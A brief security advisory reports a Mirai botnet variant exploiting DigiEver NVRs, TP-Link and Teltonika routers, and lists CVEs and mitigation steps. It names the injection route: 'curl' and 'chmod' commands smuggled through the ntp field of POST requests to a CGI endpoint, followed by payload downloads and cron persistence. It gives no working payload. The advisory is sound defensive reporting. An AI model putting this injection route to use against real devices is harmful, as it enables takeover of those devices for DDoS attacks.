Botnet actively exploits flaws in NVRs, TP-Link routers
Take action: If you are running DigiEver NVRs, TP-Link routers or Teltonika routers, review the advisory. If possible isolate the devices from the internet patch devices immediately. Most of the exploited flaws are overt a year old so there should be patches available.
Learn More
Researchers report that a new variant of the Mirai botnet has been discovered actively exploiting multiple vulnerabilities. The campaign has been active since at least September 2024.
- Untracked RCE vulnerability in DigiEver DS-2105 Pro NVRs (no CVE assigned) - Affects the '/cgi-bin/cgi_main.cgi' URI and allows unauthenticated remote command injection
- No CVE assigned yet
- Currently unpatched
- CVE-2023-1389 (CVSS score 8.8) - Affects TP-Link devices
- CVE-2018-17532 (CVSS score 9.8) - Affects Teltonika RUT9XX routers
The botnet exploits improper input validation in DigiEver NVRs to inject commands like 'curl' and 'chmod' through parameters such as the ntp field in HTTP POST requests. Once a device is compromised, the malware downloads additional binaries from external servers, establishes persistence through cron jobs and uses the device for DDoS attacks.
Users are advised to isolate the devices from the internet where possible, and to patch devices immediately. Most of the exploited flaws are overt a year old.
